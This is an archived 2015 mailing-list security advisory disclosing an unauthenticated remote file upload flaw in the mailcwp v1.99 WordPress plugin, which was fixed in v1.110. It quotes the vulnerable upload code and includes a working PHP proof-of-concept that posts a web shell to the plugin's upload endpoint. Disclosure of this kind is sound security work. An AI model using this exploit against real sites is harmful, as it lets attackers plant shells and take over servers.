lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-id: <3D0C5C47-9A9D-4C95-BF08-4AE4482C637E@me.com> Date: Thu, 16 Jul 2015 20:18:11 -0400 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: https://wordpress.org/plugins/mailcwp/ Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Vendor Contact: Contact Page via WP site Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server: 2 $message_id = $_REQUEST["message_id"]; 3 $upload_dir = $_REQUEST["upload_dir"]; . . 8 $fileName = $_FILES["file"]["name"]; 9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName"); Exploitation requires the attacker to guess a writeable location in the http server root. CVEID: OSVDB: Exploit Code: • <?php • /*Larry W. Cashdollar @_larry0 • Exploit for mailcwp v1.99 shell will be called 1-shell.php. • 7/9/2015 • */ • $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('file' => 'shell.php','file'=>'@...file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?> • Advisory: http://www.vapid.dhs.org/advisory.php?v=138 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists